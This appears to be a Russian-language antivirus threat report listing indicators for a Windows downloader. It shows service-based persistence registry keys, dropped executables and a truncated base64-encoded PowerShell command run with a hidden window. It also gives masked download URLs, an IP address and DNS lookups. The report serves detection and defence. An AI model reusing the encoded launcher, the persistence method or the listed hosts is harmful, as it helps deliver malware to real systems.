Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\KBDSMSFI] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\KBDSMSFI] 'ImagePath' = '"%WINDIR%\SysWOW64\winrnr\KBDSMSFI.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAG8AaQBjAGcAZQBvAGMAaAA9ACcAbQBpAG8AbAB5AHUAYQBiAHYAYQB1AG4AJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAdQByAGAASQB0AHkAYABwAHIAYABPAFQAbwBjAG...
- %HOMEPATH%\700.exe
- %WINDIR%\syswow64\winrnr\kbdsmsfi.exe
- %HOMEPATH%\700.exe в %WINDIR%\syswow64\winrnr\kbdsmsfi.exe
- '94.##.254.194':80
- http://lo###pelis.org/vizvx/JAmJ4u0RN/
- http://gr###cruzco.com/azk/r1tikt/
- http://94.##.254.194/qVjc/ltU2T/6jCCttR/
- DNS ASK mo###aimpex.com
- DNS ASK lo###pelis.org
- DNS ASK gr###cruzco.com
- '%HOMEPATH%\700.exe'
- '%WINDIR%\syswow64\winrnr\kbdsmsfi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAG8AaQBjAGcAZQBvAGMAaAA9ACcAbQBpAG8AbAB5AHUAYQBiAHYAYQB1AG4AJwA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAEMAdQByAGAASQB0AHkAYABwAHIAYABPAFQAbwBjAG...' (со скрытым окном)